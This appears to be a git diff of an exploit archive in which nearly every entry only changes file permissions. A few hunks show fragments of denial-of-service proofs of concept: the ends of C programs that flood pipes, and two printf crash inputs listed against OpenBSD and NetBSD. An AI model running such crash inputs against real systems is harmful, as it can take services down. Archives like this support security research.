b/platforms/asp/webapps/4239.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/42690.txt b/platforms/asp/webapps/42690.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/42776.txt b/platforms/asp/webapps/42776.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/42792.txt b/platforms/asp/webapps/42792.txt old mode 100755 new mode 100644 index 6d4dae87b..29d4bc2ea --- a/platforms/asp/webapps/42792.txt +++ b/platforms/asp/webapps/42792.txt @@ -73,4 +73,4 @@ Help AG Middle East References ---------- [1] Help AG Middle East http://www.helpag.com/ -[2] Sitefinity CMS Version Notes http://www.sitefinity.com/product/version-notes +[2] Sitefinity CMS Version Notes http://www.sitefinity.com/product/version-notes \ No newline at end of file diff --git a/platforms/asp/webapps/4458.txt b/platforms/asp/webapps/4458.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4486.txt b/platforms/asp/webapps/4486.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4578.txt b/platforms/asp/webapps/4578.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4609.txt b/platforms/asp/webapps/4609.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4644.txt b/platforms/asp/webapps/4644.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4687.htm b/platforms/asp/webapps/4687.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4697.txt b/platforms/asp/webapps/4697.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4730.txt b/platforms/asp/webapps/4730.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4848.txt b/platforms/asp/webapps/4848.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4900.txt b/platforms/asp/webapps/4900.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4921.txt b/platforms/asp/webapps/4921.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4970.txt b/platforms/asp/webapps/4970.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4971.txt b/platforms/asp/webapps/4971.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4972.txt b/platforms/asp/webapps/4972.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4988.txt b/platforms/asp/webapps/4988.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5185.txt b/platforms/asp/webapps/5185.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5187.txt b/platforms/asp/webapps/5187.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5274.txt b/platforms/asp/webapps/5274.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5276.txt b/platforms/asp/webapps/5276.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5286.txt b/platforms/asp/webapps/5286.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5373.txt b/platforms/asp/webapps/5373.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5409.txt b/platforms/asp/webapps/5409.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5456.txt b/platforms/asp/webapps/5456.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5475.txt b/platforms/asp/webapps/5475.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5503.txt b/platforms/asp/webapps/5503.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5507.txt b/platforms/asp/webapps/5507.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5553.txt b/platforms/asp/webapps/5553.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5556.txt b/platforms/asp/webapps/5556.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5564.txt b/platforms/asp/webapps/5564.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5608.txt b/platforms/asp/webapps/5608.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5705.txt b/platforms/asp/webapps/5705.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5717.txt b/platforms/asp/webapps/5717.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5753.txt b/platforms/asp/webapps/5753.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5763.txt b/platforms/asp/webapps/5763.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5765.txt b/platforms/asp/webapps/5765.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5775.txt b/platforms/asp/webapps/5775.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5780.txt b/platforms/asp/webapps/5780.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5781.txt b/platforms/asp/webapps/5781.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5805.txt b/platforms/asp/webapps/5805.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5849.txt b/platforms/asp/webapps/5849.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5850.txt b/platforms/asp/webapps/5850.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5869.txt b/platforms/asp/webapps/5869.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5894.txt b/platforms/asp/webapps/5894.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5912.txt b/platforms/asp/webapps/5912.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/5927.txt b/platforms/asp/webapps/5927.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/6119.txt b/platforms/asp/webapps/6119.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/6135.txt b/platforms/asp/webapps/6135.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/6405.txt b/platforms/asp/webapps/6405.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/6420.txt b/platforms/asp/webapps/6420.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/6453.txt b/platforms/asp/webapps/6453.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/6470.txt b/platforms/asp/webapps/6470.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/6610.txt b/platforms/asp/webapps/6610.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/6720.txt b/platforms/asp/webapps/6720.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/6725.txt b/platforms/asp/webapps/6725.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/6731.txt b/platforms/asp/webapps/6731.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/6810.txt b/platforms/asp/webapps/6810.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7067.txt b/platforms/asp/webapps/7067.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7120.txt b/platforms/asp/webapps/7120.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7137.txt b/platforms/asp/webapps/7137.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7141.txt b/platforms/asp/webapps/7141.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7259.txt b/platforms/asp/webapps/7259.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7273.txt b/platforms/asp/webapps/7273.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7274.txt b/platforms/asp/webapps/7274.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7275.txt b/platforms/asp/webapps/7275.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7276.txt b/platforms/asp/webapps/7276.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7277.txt b/platforms/asp/webapps/7277.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7278.txt b/platforms/asp/webapps/7278.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7279.txt b/platforms/asp/webapps/7279.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7280.txt b/platforms/asp/webapps/7280.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7281.txt b/platforms/asp/webapps/7281.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7282.txt b/platforms/asp/webapps/7282.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7283.txt b/platforms/asp/webapps/7283.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7287.txt b/platforms/asp/webapps/7287.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7288.txt b/platforms/asp/webapps/7288.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7292.txt b/platforms/asp/webapps/7292.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7293.txt b/platforms/asp/webapps/7293.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7295.txt b/platforms/asp/webapps/7295.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7316.txt b/platforms/asp/webapps/7316.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7325.txt b/platforms/asp/webapps/7325.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7326.txt b/platforms/asp/webapps/7326.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7327.txt b/platforms/asp/webapps/7327.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7340.txt b/platforms/asp/webapps/7340.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7348.txt b/platforms/asp/webapps/7348.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7349.txt b/platforms/asp/webapps/7349.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7350.txt b/platforms/asp/webapps/7350.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7353.txt b/platforms/asp/webapps/7353.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7356.txt b/platforms/asp/webapps/7356.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7357.txt b/platforms/asp/webapps/7357.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7359.txt b/platforms/asp/webapps/7359.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7360.txt b/platforms/asp/webapps/7360.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7361.txt b/platforms/asp/webapps/7361.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7370.txt b/platforms/asp/webapps/7370.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7371.txt b/platforms/asp/webapps/7371.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7372.txt b/platforms/asp/webapps/7372.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7373.txt b/platforms/asp/webapps/7373.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7376.txt b/platforms/asp/webapps/7376.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7378.txt b/platforms/asp/webapps/7378.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7390.txt b/platforms/asp/webapps/7390.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7391.txt b/platforms/asp/webapps/7391.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7398.txt b/platforms/asp/webapps/7398.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7412.txt b/platforms/asp/webapps/7412.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7414.txt b/platforms/asp/webapps/7414.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7415.txt b/platforms/asp/webapps/7415.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7416.txt b/platforms/asp/webapps/7416.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7419.txt b/platforms/asp/webapps/7419.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7420.txt b/platforms/asp/webapps/7420.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7423.txt b/platforms/asp/webapps/7423.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7424.txt b/platforms/asp/webapps/7424.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7425.txt b/platforms/asp/webapps/7425.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7427.txt b/platforms/asp/webapps/7427.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7428.txt b/platforms/asp/webapps/7428.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7429.txt b/platforms/asp/webapps/7429.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7436.txt b/platforms/asp/webapps/7436.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7438.txt b/platforms/asp/webapps/7438.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7440.txt b/platforms/asp/webapps/7440.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7445.txt b/platforms/asp/webapps/7445.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7446.txt b/platforms/asp/webapps/7446.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7447.txt b/platforms/asp/webapps/7447.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7450.txt b/platforms/asp/webapps/7450.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7462.txt b/platforms/asp/webapps/7462.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7464.txt b/platforms/asp/webapps/7464.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7466.txt b/platforms/asp/webapps/7466.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7468.txt b/platforms/asp/webapps/7468.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7469.txt b/platforms/asp/webapps/7469.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7470.txt b/platforms/asp/webapps/7470.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7471.txt b/platforms/asp/webapps/7471.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7472.txt b/platforms/asp/webapps/7472.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7484.txt b/platforms/asp/webapps/7484.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7485.txt b/platforms/asp/webapps/7485.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7486.txt b/platforms/asp/webapps/7486.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7488.txt b/platforms/asp/webapps/7488.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7491.txt b/platforms/asp/webapps/7491.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7495.txt b/platforms/asp/webapps/7495.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7499.txt b/platforms/asp/webapps/7499.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7508.txt b/platforms/asp/webapps/7508.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7534.txt b/platforms/asp/webapps/7534.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7599.txt b/platforms/asp/webapps/7599.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7609.txt b/platforms/asp/webapps/7609.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7610.txt b/platforms/asp/webapps/7610.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7613.txt b/platforms/asp/webapps/7613.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7627.txt b/platforms/asp/webapps/7627.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7665.txt b/platforms/asp/webapps/7665.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7666.txt b/platforms/asp/webapps/7666.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7736.htm b/platforms/asp/webapps/7736.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7741.txt b/platforms/asp/webapps/7741.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7744.txt b/platforms/asp/webapps/7744.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7752.txt b/platforms/asp/webapps/7752.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7754.txt b/platforms/asp/webapps/7754.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7761.txt b/platforms/asp/webapps/7761.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7766.txt b/platforms/asp/webapps/7766.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7767.txt b/platforms/asp/webapps/7767.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7768.txt b/platforms/asp/webapps/7768.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7769.txt b/platforms/asp/webapps/7769.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7770.txt b/platforms/asp/webapps/7770.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7771.txt b/platforms/asp/webapps/7771.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7772.txt b/platforms/asp/webapps/7772.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7773.txt b/platforms/asp/webapps/7773.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7774.txt b/platforms/asp/webapps/7774.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7782.txt b/platforms/asp/webapps/7782.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7783.txt b/platforms/asp/webapps/7783.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7784.txt b/platforms/asp/webapps/7784.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7788.txt b/platforms/asp/webapps/7788.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7789.txt b/platforms/asp/webapps/7789.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7791.txt b/platforms/asp/webapps/7791.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7800.txt b/platforms/asp/webapps/7800.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7801.txt b/platforms/asp/webapps/7801.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7802.txt b/platforms/asp/webapps/7802.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7803.txt b/platforms/asp/webapps/7803.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7807.txt b/platforms/asp/webapps/7807.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7816.txt b/platforms/asp/webapps/7816.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7850.txt b/platforms/asp/webapps/7850.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7861.txt b/platforms/asp/webapps/7861.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7872.txt b/platforms/asp/webapps/7872.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7924.txt b/platforms/asp/webapps/7924.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7963.txt b/platforms/asp/webapps/7963.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7981.txt b/platforms/asp/webapps/7981.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7982.txt b/platforms/asp/webapps/7982.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/7991.txt b/platforms/asp/webapps/7991.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8048.txt b/platforms/asp/webapps/8048.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8065.txt b/platforms/asp/webapps/8065.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8070.txt b/platforms/asp/webapps/8070.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8107.txt b/platforms/asp/webapps/8107.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8109.txt b/platforms/asp/webapps/8109.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8110.txt b/platforms/asp/webapps/8110.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8111.txt b/platforms/asp/webapps/8111.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8113.txt b/platforms/asp/webapps/8113.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8120.txt b/platforms/asp/webapps/8120.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8130.txt b/platforms/asp/webapps/8130.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8131.txt b/platforms/asp/webapps/8131.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8132.txt b/platforms/asp/webapps/8132.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8307.txt b/platforms/asp/webapps/8307.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8379.txt b/platforms/asp/webapps/8379.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8397.txt b/platforms/asp/webapps/8397.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8529.txt b/platforms/asp/webapps/8529.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8530.htm b/platforms/asp/webapps/8530.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8627.txt b/platforms/asp/webapps/8627.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8705.txt b/platforms/asp/webapps/8705.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8726.txt b/platforms/asp/webapps/8726.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8734.txt b/platforms/asp/webapps/8734.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8749.txt b/platforms/asp/webapps/8749.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8756.txt b/platforms/asp/webapps/8756.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8785.txt b/platforms/asp/webapps/8785.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8849.txt b/platforms/asp/webapps/8849.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8859.txt b/platforms/asp/webapps/8859.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8889.txt b/platforms/asp/webapps/8889.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/8890.txt b/platforms/asp/webapps/8890.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/925.txt b/platforms/asp/webapps/925.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/9328.txt b/platforms/asp/webapps/9328.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/9562.txt b/platforms/asp/webapps/9562.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/9612.txt b/platforms/asp/webapps/9612.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/9675.txt b/platforms/asp/webapps/9675.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/9809.txt b/platforms/asp/webapps/9809.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/9834.txt b/platforms/asp/webapps/9834.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/9841.txt b/platforms/asp/webapps/9841.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/9856.txt b/platforms/asp/webapps/9856.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/9857.txt b/platforms/asp/webapps/9857.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/9877.txt b/platforms/asp/webapps/9877.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/9904.txt b/platforms/asp/webapps/9904.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/9963.txt b/platforms/asp/webapps/9963.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/9967.txt b/platforms/asp/webapps/9967.txt old mode 100755 new mode 100644 diff --git a/platforms/aspx/webapps/40397.txt b/platforms/aspx/webapps/40397.txt old mode 100755 new mode 100644 diff --git a/platforms/aspx/webapps/40407.txt b/platforms/aspx/webapps/40407.txt old mode 100755 new mode 100644 diff --git a/platforms/aspx/webapps/41086.txt b/platforms/aspx/webapps/41086.txt old mode 100755 new mode 100644 diff --git a/platforms/aspx/webapps/41618.txt b/platforms/aspx/webapps/41618.txt old mode 100755 new mode 100644 diff --git a/platforms/aspx/webapps/41985.txt b/platforms/aspx/webapps/41985.txt old mode 100755 new mode 100644 diff --git a/platforms/aspx/webapps/41986.txt b/platforms/aspx/webapps/41986.txt old mode 100755 new mode 100644 diff --git a/platforms/aspx/webapps/42184.txt b/platforms/aspx/webapps/42184.txt old mode 100755 new mode 100644 diff --git a/platforms/aspx/webapps/42687.txt b/platforms/aspx/webapps/42687.txt old mode 100755 new mode 100644 diff --git a/platforms/aspx/webapps/42923.txt b/platforms/aspx/webapps/42923.txt old mode 100755 new mode 100644 diff --git a/platforms/atheos/local/21282.c b/platforms/atheos/local/21282.c old mode 100755 new mode 100644 diff --git a/platforms/beos/dos/19938.txt b/platforms/beos/dos/19938.txt old mode 100755 new mode 100644 index 6c5cc8d21..de6b7590a --- a/platforms/beos/dos/19938.txt +++ b/platforms/beos/dos/19938.txt @@ -20,4 +20,4 @@ Bad TCP Cksm = 0% TCP Opts Pcnt = 0% 4000 @ 1689.1 pkts/sec and 1105.4 k/s Caught signal 2 Used random seed 31337 -Wrote 5002 packets in 2.74s @ 1824.48 pkts/s \ No newline at end of file +Wrote 5002 packets in 2.74s @ 1824.48 pkts/s \ No newline at end of file diff --git a/platforms/beos/local/19840.txt b/platforms/beos/local/19840.txt old mode 100755 new mode 100644 diff --git a/platforms/beos/local/19841.casl b/platforms/beos/local/19841.casl old mode 100755 new mode 100644 diff --git a/platforms/beos/remote/20404.txt b/platforms/beos/remote/20404.txt old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/10185.txt b/platforms/bsd/dos/10185.txt old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/10186.txt b/platforms/bsd/dos/10186.txt old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/10187.txt b/platforms/bsd/dos/10187.txt old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/14947.txt b/platforms/bsd/dos/14947.txt old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/16064.c b/platforms/bsd/dos/16064.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/17097.c b/platforms/bsd/dos/17097.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/19117.c b/platforms/bsd/dos/19117.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/19423.c b/platforms/bsd/dos/19423.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/19488.c b/platforms/bsd/dos/19488.c old mode 100755 new mode 100644 index ab82d4724..968eb9632 --- a/platforms/bsd/dos/19488.c +++ b/platforms/bsd/dos/19488.c @@ -31,8 +31,4 @@ write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } exit(0); -} - - - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/bsd/dos/19564.c b/platforms/bsd/dos/19564.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/19896.c b/platforms/bsd/dos/19896.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/19982.c b/platforms/bsd/dos/19982.c old mode 100755 new mode 100644 index 0fe7f96de..d49476a25 --- a/platforms/bsd/dos/19982.c +++ b/platforms/bsd/dos/19982.c @@ -35,4 +35,4 @@ sizeof(int)); write(p[1], crap, BUFFERSIZE); } exit(0); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/bsd/dos/21077.c b/platforms/bsd/dos/21077.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/2524.c b/platforms/bsd/dos/2524.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/2541.c b/platforms/bsd/dos/2541.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/2542.c b/platforms/bsd/dos/2542.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/2639.c b/platforms/bsd/dos/2639.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/31333.txt b/platforms/bsd/dos/31333.txt old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/31550.c b/platforms/bsd/dos/31550.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/33318.txt b/platforms/bsd/dos/33318.txt old mode 100755 new mode 100644 index 65efd18e8..4e71028de --- a/platforms/bsd/dos/33318.txt +++ b/platforms/bsd/dos/33318.txt @@ -9,4 +9,4 @@ The following are reported vulnerable: OpenBSD 4.6 NetBSD 5.0.1 -printf %*********s 666 \ No newline at end of file +printf %*********s 666 \ No newline at end of file diff --git a/platforms/bsd/dos/33319.txt b/platforms/bsd/dos/33319.txt old mode 100755 new mode 100644 index 6ce8885f5..31a9d9350 --- a/platforms/bsd/dos/33319.txt +++ b/platforms/bsd/dos/33319.txt @@ -11,4 +11,4 @@ NetBSD 5.0.1 The following example is available: -printf %.1100000000f 1.1 \ No newline at end of file +printf %.1100000000f 1.1 \ No newline at end of file diff --git a/platforms/bsd/dos/33708.c b/platforms/bsd/dos/33708.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/343.c b/platforms/bsd/dos/343.c old mode 100755 new mode 